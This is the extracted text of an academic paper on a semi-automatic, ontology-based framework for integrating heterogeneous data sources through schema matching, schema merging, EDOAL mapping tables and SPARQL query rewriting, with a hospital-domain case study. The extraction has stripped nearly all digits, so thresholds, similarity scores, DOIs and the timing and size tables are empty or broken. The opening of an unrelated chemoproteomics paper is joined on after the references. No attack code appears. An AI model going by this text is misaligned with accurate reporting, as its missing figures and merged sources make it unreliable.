the semantic matcher, for each pair (cg,cl), generates the following information: • semanticrel: the type of semantic relation (≡,v,w,idk); • semanticsim: is a coefficient∈[ , ] that specifies the reliability of the generated semantic relation. given n and m the number of local and global schema classes, respectively, the output of the semantic matching activity is: (cgi,clj)⇒i∈[ ,m] j∈[ ,n] { semanticrel semanticsim } the contextual matching activity generates mappings between classes taking into account how they are modeled, that is considering their properties. first, you must determine the equivalent properties between the two schemes. this is done by applying to all pairs fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (pg,pl), where pg and pl are the properties of the global and local schema respectively, the syntax-based or the semantic-based matcher. the syntax-based matcher, by analyzing the syntactic structure of words, returns for each pair (pg,pl) a coefficient in a range [ , ]. if the latter is greater than or equal to the β threshold value, a mapping is generated between pg and pl. the semantic-based matcher, instead, using wordnet to extract property sense, generates a mapping between pg and pl if there is an equivalence relation for at least one token pair. the semantic-based matcher is useful if synonyms are used to represent the same property and/or to discover mappings :n. once the mappings have been discovered, it is possible to calculate, for all pairs (pg,pl), the degree of contextual similarity, defined as contextualsim, by applying the jaccard measure: contextualsim(cg,cl)= |p(cg)∩p(cl)| |p(cg)∪p(cl)| where p(cg) and p(cl) are the set of properties of the classes cg and cl respectively. the cardinality of the intersection of the two sets is equal to the number of existing mappings between the properties of the two classes. given n and m the number of local and global schema classes, respectively, the output of the contextual matching activity is a set of pair as: (cgi,clj)⇒i∈[ ,m] j∈[ ,n] { contextualsim mp(cgi),p(clj) } where mp(cgi),p(clj) is the set of mappings between the properties of classes cgi and clj: mp(cgi),p(clj)=   p (cgi) ←→ p (clj) p (cgi) ←→ p (clj) ··· pk(cgi) ←→ pz(clj)   where k is the number of properties of the class cgi and z is the number of properties of the class clj. to determine which mappings can be returned to the user, a selection step is performed. the principle is that if there is a semantic relation semanticrel and the degree of contextual similarity contextualsim is greater than or equal to a threshold value, the corresponding mappings can be returned. by lowering these values, more weight is given to semantic characteristics rather than contextual ones. given a semantic relation rel and a threshold value α, the algorithm selects : , :n, n: and n:m mappings between all pairs of classes (cgi,clj) if there is a semantic relation equal to rel and if contextualsim≥α. if more mappings :n, n: and n:m for the same pair of classes (cgi,cli) have a threshold value grater than α, is returned the mapping with the largest number of classes. the output is the set of selected mappings. the output of schema matching activity, according to the definition . , is a alignment a consisting of a set of mappings between the local and global fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
schema classes, obtained after the selection step: a={m({cg}k,{cl}z)}⇒(cgi,clj)⇒i∈[ ,k] j∈[ ,z]   semanticrel similarity mp(cgi),p(clj)   mappings can be : , :n, n: and n:m. schema merging the goal of schema merging activity, starting from user validated mappings, is the fusion between the local and global schema, generating a new virtual view. schema merging activity is divided into two steps: • in the first step, changes in the global schema are generated; • in the second step, based on the proposed changes, the fusion of schemas is performed. in the first step, given an input alignment a (the mappings list), the global schema g and the local one l, the new global schema t is initially created, which is initially equal to g, and the empty mapping list ml that will contain the mappings between l and t elements. merging is performed by applying merge operators to each input mapping. next, the local schema classes and relations, not included in the global schema, are added to t . the new resulting schema is modified by deleting redundant relationships and performing refactoring operations. the framework has an internal data structure to track changes to the new global schema t . in the second step, given the changes produced and after deciding whether to validate or not, the real schema merging is performed. output of schema merging activity, besides to the new global schema t , according to the definition . , also consists of the mapping table mt , whose rows represent a eg element of the global schema g and columns represent the el ,el ,...,eln elements of the local schemas l that are mapped to eg. since it is possible to define complex mappings n:m, the mapping table will be a table whose rows represent an egi expression of an element of the global schema g and the columns represent the expressions eljk of the j-th element of the k-th local schema. a generic mt[i,j] element of the mapping table represents, in fact, a mapping m(id,egi,eljk,n,rel) between the expression of an element i-th of the global schema and an expression of an element j-th of the k-th local schema. mapping table in the mapping table, according with the definition . , rows represent elements of the global schema, and columns represent elements of the local schemes. elements are generic owl expressions and table shows the possible mappings in the mapping table: the framework, however, allows mappings to be defined in a generic way, without explicit reference to a global or local schema. for this reason, the framework must be configured by setting a parameter dir ={global,local} indicating the direction of the mappings in such a way as to support queries reformulation. if not specified, it is assumed that in the rows there are expressions referring to the global schema and in the columns fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping table. global schema g local schemas , ,...,n ce mapping ceg ⋃ i∈[ ,n]cei ope mapping opeg ⋃ i∈[ ,n]opei dpe mapping dpeg ⋃ i∈[ ,n]dpei the expressions referring to the local schemes. when it is necessary to insert a mapping in the opposite direction, it is inverted. the mapping table is represented using the edoal (http://alignapi.gforge.inria.fr/ edoal.html) language. for example, we consider the following mapping: m(hospital,infirmary,≡, . 
,[(name,name)]) for the mapping m(hospital,infirmary), assuming to assign to the first schema the prefix src# and to the second schema the prefix trg#, the mapping representation for the property name will be as follows: <map > <cell > <entity > <edoal:property rdf:about="src#name"/> </entity > <entity > <edoal:property > <edoal:or rdf:parsetype =" collection"> <edoal:property > <edoal:and rdf:parsetype =" collection"> <edoal:property rdf:about="trg#name"/> <edoal:propertydomainrestriction > <edoal:class > <edoal:class rdf:about="trg#infirmary"/> </edoal:class > </edoal:propertydomainrestriction > </edoal:and > </edoal:property > </edoal:or> </edoal:property > </entity > <relation >=</relation > <measure rdf:datatype=’http ://www.w .org / / xmlschema#float ’> . </measure > </cell > </map > query processing the framework allows query execution by defining a query, posed over the global schema, through sparql (https://www.w .org/tr/rdf-sparql-query/). the query rewriting process (thiéblin et al., ) exploits correspondences :n between global and local schema elements, expressed in descriptive logic, and applies a set of transformation rules to such correspondences. inputs of query rewriting process are a sparql query and a mapping table mt (in edoal format) and generates a set of queries, also expressed in sparql. subsequently generated queries are transmitted to the acquisition subsystem for their evaluation, that is, to perform the local query processing task. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://alignapi.gforge.inria.fr/edoal.html http://alignapi.gforge.inria.fr/edoal.html https://www.w .org/tr/rdf-sparql-query/ http://dx.doi.org/ . /peerj-cs. global query processing query rewriting process is performed by rewriting the graph pattern of a sparql query, applying the transformation rules to each triple pattern in it. since a triple pattern can refer to data (for example, instance relationships) or schema (class and/or property relationships), or both, a pattern subdivision is performed based on the type. a triple pattern is a triple (subject,predicate,object), which can be classified as: • dtp (data triple pattern): if it is related to information concerning data and not the schema; • stp (schema triple pattern): if it is related to information concerning data and not the schema. the reformulation process (algorithm ) applies the three-step transformation rules. in the first step, the triple is rewritten by considering the specified mappings for the predicate part. in the second step are considered mappings for the object part, and finally for the subject part. sparql variables, constants, and rdf/rdfs/owl properties, which may appear in the subject, predicate, and object part of a triple, are not rewritten. as a result, the they will also appear in the rewritten query. algorithm sparql rewriting input: sparql query qin, mapping table mt output: sparql query qout : gpin ← graph pattern of qin : gpout ←gpin after replacing iris in filter, using : mappings mt : gpout ←triple pattern rewriting(gpout , mt , predicate) : gpout ←triple pattern rewriting(gpout , mt , object) : gpout ←triple pattern rewriting(gpout , mt , subject) : qout ←new query containing gpout transformation rules (thiéblin et al., ) are described by a set of functions of the type: dxy(t,µ)→tr ( ) sxy(t,µ)→tr ( ) where t is a dtp (in eq. ( )) or stp (in eq. 
( )),µ is the mapping between es (source schema entity) and et (target schema entity) for the subject, predicate or object part of t, x ∈{s,p,o} denotes the part of the triple used by the function, y ∈{c,op,dp,∗} represents the type of x (a class, relation, property or any, respectively) and tr represents the transformation rule. a mapping µ is a generic element mt[i,j]=m(id,egi,eljk,n,rel) of the mapping table mt . although the mapping table allows managing : , :n, n: and n:m mappings, the query reformulation process does not consider n: and n:m mappings. functions eqs. ( ) and ( ) are used to rewrite each triple of the input graph pattern. output of global query processing is a set of queries, posed over the local ontologies, still expressed in sparql. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure first data source: (a) entity-relationship diagram and (b) local view. full-size doi: . /peerjcs. /fig- local query processing local query processing is the second activity of the mediation process. each reformulated query is still expressed in sparql and a second reformulation step is required for those data sources that use a language other than sparql to retrieve data. relational sources that the framework allows to integrate use sql to express a query. to perform query reformulation, a sparql engine is used, which uses query rewriting techniques and inference mechanisms: quest (rodriguez-muro, hardi & calvanese, ). query processing for xml data source is supported by a framework, integrated in the system, that allows query reformulation from sparql to xquery (https: //www.w .org/tr/xquery- /: sparql xquery (bikakis et al., ). case study in order to validate the proposed framework, a case study was conducted using three heterogeneous data sources (two relational data sources, and one semi-structured, specifically a spreadsheet) designed in different contexts, related to the health domain applications. as initial step the first source is acquired, which entity-relationship diagram and local view are shown in fig. . at this point its local view becomes the new virtual view. in this case the only steps that must be performed are those of source wrapping and annotation of the schema. the extraction of semantic information, through the schema annotation activity, is necessary as this information will be used to generate the mapping with the source schemes that will be acquired later. the output of the schema annotation activity is a set of annotations an , one for each element ei of the schema, where each annotation ani is a triple (toki,posi,sensei) composed by: • toki: the token of the element ei; • posi: the lexical category of the token toki; • sensei: the sense of the token toki for the lexical category posi, as output of the disambiguation process. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.w .org/tr/xquery- / https://www.w .org/tr/xquery- / http://dx.doi.org/ . /peerj-cs. table output of the schema annotation activity. 
class token sense hospital hospital sense# : a health facility where patients receive treatment professional professional sense# : an athlete who plays for pay supplier supplier sense# : someone whose business is to supply a particular service or commodity instrumentation instrumentation sense# : an artifact (or system of artifacts) that is instrumental in accomplishing some end figure second data source: (a) entity-relationship diagram and (b) local view. full-size doi: . /peerjcs. /fig- in table is shown an extracted of the output of the schema annotation activity performed over the first local view. then, the second source is acquired, which entity-relationship diagram and local view are shown in fig. . as in the first integration step, the source wrapping and schema annotation activities are performed. subsequently, the schema matching activity is performed. to this aim, the following thresholds setting is adopted: α≡ = . αv/w= . αidk = . β = . once the schema matching is completed the mappings are obtained. some examples are: m(hospital,hospital,≡, ,[(address,address, ),(name,name, ),(code,hosp_code, . )]) m(oerating_room,surgery,w, ,[(code,surgery_code, . ), (numtables,numbertables, . )]) fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. m(supplier,person,v, ,[(name,name, ),(address,address, ), (code,code, ),(city,citybirth, . )]) m(office,lab,idk, ,[(type,typelab, . ),(name,namelab, . ), (code,code_lab, . )]) during the validation step of the mappings, the user should to delete the mapping m(office,lab) and replace the semantic relationship of the mapping m(operating_room,surgery) to (≡), as that relationship, in the surgery class of the first scheme, refers to a room in which a doctor can be consulted, while in the second scheme to an operating room. he also should to delete the correspondence between properties city and citybirth in the mapping m(supplier,person). the m(office,lab) mapping is returned because the two classes match all properties and, as a result, the contextual similarity measure is . this mapping must be deleted otherwise during the schema merging activity a wrong association relationship will be created between the two classes. the αidk threshold was chosen at . to highlight this observation. if association relationships have no reason to be created, the schema matching activity should be performed with a high value for the αidk threshold. the threshold value αv/w was chosen equal to . because, if it was lower, the mapping m(ward,person) would be added a semantic relationship of hyponymy, but this mapping is wrong. in the set of mappings should also to appear the mapping :n m(hospital,{hospital,statistics}) but is not returned because of the threshold αidk high. to take into account the representation of the hospital concept through the hospital and statistics classes, there are therefore two alternatives. the first one is to keep the threshold value of αidk high and insert manually the mapping. the second one is to lower the threshold and eliminate the other mappings in which there is a idk relationship, except the mapping except the mapping mentioned above. however, the following mapping is also obtained: m(hospital,{hospital,statistics})=[m(hospital,hospital),m(hospital,statistics)]=[ m(hospital,hospital,≡, ,[ (address,address, ), (name,name, ), (code, hosp_code, . )]), m(hospital,statistics,idk, . ,[ (numadmission,numberadmission, . ), (numdead,numberdead, . 
the global view is initially the local view of the first source. at this point the schema merging activity is performed. the new global view is shown in fig. .

figure : global view after the second source integration.

as an example, consider the mapping m(hospital,{hospital,statistics}). assuming the prefix merged# for the global view, the prefix hospital_ # for the first local view and hospital_ # for the second local view, once the schema merging activity is performed, the representation of the mapping m(hospital,{hospital,statistics}) will be as follows:

    <map>
      <entity>
        <edoal:class rdf:about="merged#hospital"/>
      </entity>
      <entity>
        <edoal:class>
          <edoal:or rdf:parsetype="collection">
            <edoal:class rdf:about="hospital_ #hospital"/>
            <edoal:class rdf:about="hospital_ #hospital"/>
          </edoal:or>
        </edoal:class>
      </entity>
      <relation>=</relation>
    </map>
    <map>
      <entity>
        <edoal:class rdf:about="merged#statistics"/>
      </entity>
      <entity>
        <edoal:class>
          <edoal:or rdf:parsetype="collection">
            <edoal:class rdf:about="hospital_ #statistics"/>
          </edoal:or>
        </edoal:class>
      </entity>
      <relation>=</relation>
    </map>

in a similar way the correspondences for the other elements of the schemas are defined.

figure : third data source: (a) part of spreadsheet and (b) part of spreadsheet .

the third source acquired is composed of different spreadsheets. some parts of the spreadsheets are shown in fig. . an extract of the local view of the third source is shown in fig. .

figure : local view of the third source.

after the source wrapping and schema annotation activities are performed, the schema matching activity is performed using the following threshold values: α≡ = . , αv/w = . , αidk = . , β = . . the threshold value of the contextual similarity β is set to . because, although some classes are designed with different attributes, they represent the same real-world concept, and the corresponding mappings must therefore be returned. this situation is managed by lowering the value of β but not those of αv/w and α≡. the high value of αidk is meant to filter out almost all idk mappings, since they are not correct. it has been increased through tuning activities in order to filter out all those concepts with an empty set of mappings between their properties. in this way we can provide the user with just a few mappings to be validated. examples of the mappings returned to the user are the following:
m(hospital,hospital,≡, ,[(code,hospital_code, . ),(name,hospitalname, . ),(address,street_address, . ),(city,city, )])
m(hospital,rehabilitation_hospital,≡, . ,[(code,hospital_code, . ),(name,hospitalname, . ),(address,street_address, . ),(city,city, )])
m(hospital,children_specialtyhospital,≡, . ,[(code,hospital_code, . ),(name,hospitalname, . ),(address,street_address, . ),(city,city, )])
m(hospital,psychiatric_hospital,≡, . ,[(code,hospital_code, . ),(name,hospitalname, . ),(address,street_address, . ),(city,city, )])
m(person,contact_person,w, . ,[(address,email_address, . ),(name,name, )])
m(person,administrator,w, ,[(address,email_address, . ),(name,name, )])
during the validation step of the mappings, the user should insert an idk mapping between the hospital and specialized_hospital_characteristics classes, delete the correspondence between the address and email_address properties in the mapping m(person,administrator), and replace the semantic relationship of the mapping m(person,contact_person) with idk. the user should also insert a mapping ≡ between the operating_room and surgery classes, as they both refer to an operating room. besides, the semantic relationship of the mappings m(hospital,rehabilitation_hospital), m(hospital,psychiatric_hospital) and m(hospital,children_specialtyhospital) should be replaced with w. since the user has knowledge of the application domain, he is able to recognize which mappings must be deleted and which must not. once the schema matching activity has been completed, the next step is the schema merging activity. the new global view, in which the attributes are not shown, is shown in fig. .

figure : new global view after the third data source is integrated.

after the third source is integrated, a lot of mappings are included, but many of them, as well as an example of the mapping table, are omitted from the example in order not to confuse the reader in understanding the full integration process.

query processing
in the query processing activity the user has the possibility to run a query over the global virtual view through sparql (https://www.w3.org/tr/rdf-sparql-query/), as mentioned in 'query processing'. we provide a short example of the query rewriting process, considering three queries. the uris used are merged# for the global virtual view and hospital_ #, hospital_ # and hospital_ #, respectively, for the first, second and third source. the first query is: ''return all instances of the hospital class, with the corresponding names'':

    select ?x ?y
    where { ?x rdf:type merged#hospital .
            ?x merged#name ?y }

in this case, the hospital classes of the first, second and third local views are merged in the global view. the mediation subsystem translates the above query into three queries, one for each of the integrated data sources. the reformulated queries are the following:

    select ?x ?y
    where { ?x rdf:type hospital_ #hospital .
            ?x hospital_ #name ?y ; rdf:type hospital_ #hospital }

    select ?x ?y
    where { ?x rdf:type hospital_ #hospital .
            ?x hospital_ #name ?y ; rdf:type hospital_ #hospital }

    select ?x ?y
    where { ?x rdf:type hospital_ #hospital .
            ?x hospital_ #hospitalname ?y ; rdf:type hospital_ #hospital }

the second query is: ''return all instances of the person class, with the corresponding names'':

    select ?x ?name
    where { ?x rdf:type merged#person .
            ?x merged#name ?name }

the reformulated queries are the following:

    select ?x ?name
    where { ?x rdf:type hospital_ #professional
            { ?x hospital_ #name ?name ; rdf:type hospital_ #supplier }
            union
            { ?x hospital_ #name ?name ; rdf:type hospital_ #professional } }

    select ?x ?name
    where { ?x rdf:type hospital_ #person .
            ?x hospital_ #name ?name ; rdf:type hospital_ #person }
    select ?x ?name
    where { ?x rdf:type hospital_ #administrator .
            ?x hospital_ #name ?name ; rdf:type hospital_ #administrator }

the third query is: ''return all instances of the person class living in benevento'':

    select ?person ?city
    where { ?person rdf:type merged#person .
            ?person merged#address ?city
            filter regex(?city, "benevento", "i") }

the reformulated queries are the following:

    select ?person ?city
    where { { ?person rdf:type hospital_ #professional
              { ?person hospital_ #address ?city ; rdf:type hospital_ #professional }
              union
              { ?person hospital_ #address ?city ; rdf:type hospital_ #hospital }
              union
              { ?person hospital_ #address ?city ; rdf:type hospital_ #supplier } }
            filter regex(?city, "benevento", "i") }

    select ?person ?city
    where { { ?person rdf:type hospital_ #person
              { ?person hospital_ #address ?city ; rdf:type hospital_ #person }
              union
              { ?person hospital_ #address ?city ; rdf:type hospital_ #hospital } }
            filter regex(?city, "benevento", "i") }

    select ?person ?city
    where { ?person rdf:type hospital_ #administrator ;
                    hospital_ #street_address ?city ;
                    rdf:type hospital_ #hospital
            filter regex(?city, "benevento", "i") }

if an element does not have a correspondence with any element of some local view, the query translated for that view is the same as the query over the global view. the corresponding wrapper will simply return an empty result when the query is executed.

analysis
we report the time overheads of each phase of the proposed approach. the presented case study is meant to show the application of the approach rather than to optimize the performance of the activities of the integration process. for this reason, as shown in table , the size of the data sources, in terms of the number of elements of the structures that represent them, is not high.

table : size of the local views.
                       first source   second source   third source
number of classes
number of relations
number of properties
number of instances

nevertheless, the developed software prototype shows good performance in terms of the execution time of the proposed approach phases, as shown in table .

table : time overheads of the proposed approach.
activity                                     time (ms)
source wrapping (first source)
source wrapping (second source)
source wrapping (third source)
schema matching (first and second views)
schema matching (global and third views)
schema merging (first and second views)
schema merging (global and third views)
total time of the integration process

table : time overheads of the query processing activity.
                            first query   second query   third query
query rewriting time (ms)
query execution time (ms)

the acquisition of excel data sources has a longer execution time than the acquisition of relational data sources. this is because we need to consider the access times to the file and the identification of the tables that will constitute the elements of the local view. the execution times of the schema matching and merging activities are relatively low, thanks to optimizations of the algorithms and data structures used. to the total execution time of the full integration process, the time necessary to validate the mappings, which depends on the user, and the setup time needed for the schema matching activity (about s) must be added.
during the setup of the schema matching activity, performed only once, the modules needed for the annotation activity of the local views are loaded. table , instead, shows the execution times of the query processing activity. the transformation of the queries has low execution times because the prototype is supported by the mapping table. with the mapping table we can reduce the time needed to search for an element (class, property or relationship) inside the local view that should be replaced in the query. this is not true when the query is actually executed, because the execution time depends on the specific technology of each data source.

conclusions
the purpose of this paper is to allow unified access to heterogeneous and independent source data, offering a data integration approach that addresses all the issues discussed. the architecture adopted is that of mediation systems, which create a virtual view of the real data and allow external applications to access data through that view in a transparent manner. transparency is guaranteed by translating queries posed over the virtual view into queries that are directly executable by the local sources.
the proposed approach allows unified access to heterogeneous sources through the following activities:
• source wrapping: the initial activity is the construction of an ontology for each source to be integrated, whose structure is subsequently refined by using information extraction techniques to improve the quality of the ontology.
• schema matching: the ontologies are then put through a matching process in order to automatically search for mappings between the elements of the structures, using both syntax-based and semantic-based techniques. mappings are identified by combining both semantic and contextual characteristics of each element. these mappings are then validated and, if necessary, modified by the user.
• schema merging: based on the generated mappings, a global ontology is created, which is the virtual view of the system.
• query reformulation: at this stage, a query posed over the virtual view is reformulated into a set of queries directly executable by the local sources. the reformulation task is performed automatically, generating an execution plan of the reformulated queries, with the possibility for the user to modify each single query.
overall, the approach is semi-automatic, but compared to existing systems the user's effort is minimized, as the user only intervenes in the matching configuration activity, by setting the threshold values for mapping generation, and in mapping validation. both simple (1:1) and complex (1:n, n:1 and n:m) mappings are generated. the outlined approach is supported by a specially designed and developed software system. the system provides a first level of abstraction of the activities and the components involved in their execution, and a second level of component specialization. although the design of the system is aimed at covering all aspects of data integration described so far, the implementation has some limitations. in particular, the acquisition of unstructured sources is not yet covered by the implementation, and the data reconciliation process requires the development of appropriate components. except for such activities, the integration and mediation processes are fully supported by the system.
research activities that will be carried out in the future will have the goal of overcoming the limitations shown and consolidating, at the same time, the part of the system developed so far. in particular, accurate experimentation is required for validating the proposed approach, for ensuring high quality of mappings and local and global views, for optimizing the mediation process. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • giuseppe fusco and lerina aversano conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/gppfusco/dataintegrationframework. references arens y, chee cy, hsu c-n, knoblock ca. . retrieving and integrating data from multiple information sources. international journal of intelligent and cooperative information systems ( ): – doi . /s . arens y, hsu c-n, knoblock ca. . query processing in the sims information mediator. advanced planning technology : – . beneventano d, bergamaschi s. . the momis methodology for integrating heterogeneous data sources. in: building the information society. boston: springer, – . bikakis n, gioldasis n, tsinaraki c, christodoulakis s. . querying xml data with sparql. in: international conference on database and expert systems applications. boston, ma: springer, – . calvanese d, lembo d, lenzerini m. . survey on methods for query rewriting and query answering using views. in: integrazione, warehousing e mining di sorgenti eterogenee. – . chawathe s, garcia-molina h, hammer j, ireland k, papakonstantinou y, ullman j, widom j. . the tsimmis project: integration of heterogenous information sources. in: information processing society of japan (ipsj ), october . tokyo, japan. chiticariu l, kolaitis pg, popa l. . interactive generation of integrated schemas. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . civili c, console m, de giacomo g, lembo d, lenzerini m, lepore l, mancini r, poggi a, rosati r, ruzzi m. . mastro studio: managing ontology-based data access applications. proceedings of the vldb endowment ( ): – doi . / . . fong j, pang f, fong a, wong d. . schema integration for object-relational databases with data verification. in: proceedings of the international computer symposium workshop on software engineering and database systems, taiwan. – . ghawi r, cullot n. . database-to-ontology mapping generation for semantic interoperability. in: vdbl’ conference, vldb endowment acm. new york: acm, – . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gppfusco/dataintegrationframework http://dx.doi.org/ . /s http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. ghawi r, cullot n. . building ontologies from xml data sources. in: database and expert systems application, . dexa’ . th international workshop on. ieee, – . goh ch, bressan s, madnick s, siegel m. . context interchange: new features and formalisms for the intelligent integration of information. 
acm transactions on information systems (tois) ( ): – doi . / . . hull r, king r (eds.) . reference architecture for the intelligent integration of infor- mation. available at http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf . katsis y, papakonstantinou y. . view-based data integration. in: encyclopedia of database systems. boston: springer, – . kong h, hwang m, kim p. . a new methodology for merging the heterogeneous domain ontologies based on the wordnet. in: international conference on next generation web services practices, . piscataway: ieee, . lee m, ling t. . a methodology for structural conflict resolution in the integration of entity-relationship schemas. knowledge and information systems ( ): – doi . /s - - -x. lenzerini m. . data integration: a theoretical perspective. in: proceedings of the twenty-first acm sigmod-sigact-sigart symposium on principles of database systems. pods ’ . new york: acm, – doi . / . . mena e, kashyap v, illarramendi a, sheth ap. a. managing multiple information sources through ontologies: relationship between vocabulary heterogeneity and loss of information. in: ceur workshop proceedings, . dayton: kno.e.sis publications, – . mena e, kashyap v, sheth a, illarramendi a. b. observer: an approach for query processing in global information systems based on interoperation across pre-existing ontologies. in: proceedings of the first ifcis international conference on cooperative information systems. piscataway: ieee, – . orsini m, beneventano d, cruz if, direttore ii. . query management in data integration systems: the momis approach. phd thesis, international doctorate school in information and communication technologies of the university of modena and reggio emilia. preece a, hui k, gray p. . kraft: supporting virtual organisations through knowledge fusion. in: artificial intelligence for electronic commerce: papers from the aaai- workshop. – . preece a, hui k-y, gray a, marti p, bench-capon t, jones d, cui z. . the kraft architecture for knowledge fusion and transformation. knowledge-based systems ( ): – doi . /s - ( ) - . rodriguez-muro m, hardi j, calvanese d. . quest: efficient sparql-to-sql for rdf and owl. in: proceedings of the th international conference on posters demonstrations track-volume, . – available at http://ceur-ws.org/ . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://ceur-ws.org/ http://dx.doi.org/ . /peerj-cs. shvaiko p, euzenat j. . a survey of schema-based matching approaches. in: journal on data semantics iv. boston: springer, – . thiéblin É, amarger f, haemmerlé o, hernandez n, trojahn c. . rewriting select sparql queries from : n complex correspondences. ontology matching . wache h, voegele t, visser u, stuckenschmidt h, schuster g, neumann h, hübner s. . ontology-based integration of information-a survey of existing approaches. 
in: ijcai- workshop: ontologies and information sharing, vol. . – . xiao g, calvanese d, kontchakov r, lembo d, poggi a, rosati r, zakharyaschev m. . ontology-based data access: a survey. in: proceedings of the twenty-seventh international joint conference on artificial intelligence. international joint conferences on artificial intelligence organization, . xu l, embley dw. . combining the best of global-as-view and local-as-view for data integration. in: ista, vol. . – . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. submitted march accepted july published august corresponding author piero ricchiuto, ricchiuto.piero@gmail.com academic editor robert winkler additional information and declarations can be found on page doi . /peerj-cs. copyright contrino et al. distributed under creative commons cc-by . open access doscheda: a web application for interactive chemoproteomics data analysis bruno contrino , eric miele , ronald tomlinson , m. paola castaldi and piero ricchiuto department of quantitative biology, discovery sciences, astrazeneca, cambridge, united kingdom department of chemical biology, discovery biology, discovery sciences, astrazeneca, waltham, ma, united states of america abstract background. mass spectrometry (ms) based chemoproteomics has recently become a main tool to identify and quantify cellular target protein interactions with ligands/drugs in drug discovery. the complexity associated with these new types of data requires scientists with a limited computational background to perform systematic data quality controls as well as to visualize the results derived from the analysis to enable rapid decision making. to date, there are no readily accessible platforms specifically designed for chemoproteomics data analysis. results. we developed a shiny-based web application named doscheda (down stream chemoproteomics data analysis) to assess the quality of chemoproteomics experiments, to filter peptide intensities based on linear correlations between replicates, and to perform statistical analysis based on the experimental design. in order to increase its accessibility, doscheda is designed to be used with minimal user input and it does not require programming knowledge. typical inputs can be protein fold changes or peptide intensities obtained from proteome discover, maxquant or other similar software. doscheda aggregates results from bioinformatics analyses performed on the input dataset into a dynamic interface, it encompasses interactive graphics and enables customized output reports. conclusions. doscheda is implemented entirely in r language. it can be launched by any system with r installed, including windows, mac os and linux distributions. doscheda is hosted on a shiny-server at https://doscheda.shinyapps.io/doscheda and is also available as a bioconductor package (http://www.bioconductor.org/). subjects bioinformatics keywords quantitative chemoproteomics, statistical models, web interface, shiny, tmt, itraq, proteomics, quantitative chemical biology, drug dose-response, protein drug profiling background many drugs fail in the clinic for lack of efficacy or for toxicity and as such, some of the most important steps in drug discovery are evaluation of target engagement and off-targets liabilities. next generation sequencing (ngs) and mass spectrometry proteomics-based drug discovery (jones & neubert, ) approaches offer unique how to cite this article contrino et al. 
( ), doscheda: a web application for interactive chemoproteomics data analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:ricchiuto.piero@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doscheda.shinyapps.io/doscheda http://www.bioconductor.org/ http://dx.doi.org/ . /peerj-cs. opportunities to deeply characterize drug-targets biology and pharmaceutical agents (bantscheff et al., ; bantscheff et al., ). quantitative chemical proteomics (bantscheff & drewes, ) and ms-cellular thermal shift assay (ms-cetsa) (martinez & nordlund, ) have been recently deployed in drug discovery to aid target deconvolution in the context of phenotypic screens, to elucidate drugs’ mechanisms of action and evaluation of drug repurposing (schirle, bantscheff & kuster, ). a generous number of computational tools has been developed for ms-spectral analysis and protein quantification, such as proteome discoverer (https://www.thermofisher.com/), maxquant (cox & mann, ) or peaks (http://www .bioinfor.com) for de novo peptide sequencing. however, the increasing variety of ms based approaches for drug target deconvolution can produce data that need dedicated downstream analysis platforms for facilitating the biological interpretation of results. here, we focus on quantitative chemoproteomics used to determine protein interaction profiles of small molecules from whole cell or tissue lysates (manning, ). chemoproteomics includes reverse competition-based experiments that, in combination with quantitative ms (e.g., tandem mass tags (tmt) or isobaric tag for relative quantification (itraq)), are used for rank-ordering of small molecule-protein interactions by binding affinity (bantscheff & drewes, ). although several comprehensive analysis pipelines, such as ocap (wang, yang & yang, ), prosightpc (http://proteinaceous.net/software/), toppic (kou, xun & liu, ), msstats (choi et al., ), skyline (maclean et al., ), maxquant & perseus (tyanova et al., ) and dapar & prostar (wieczorek et al., ), have been developed for the downstream data analysis, to the best of our knowledge there are no tools specifically designed to facilitate chemoproteomics data analysis for scientists with a limited computational background and available as a public server application. 
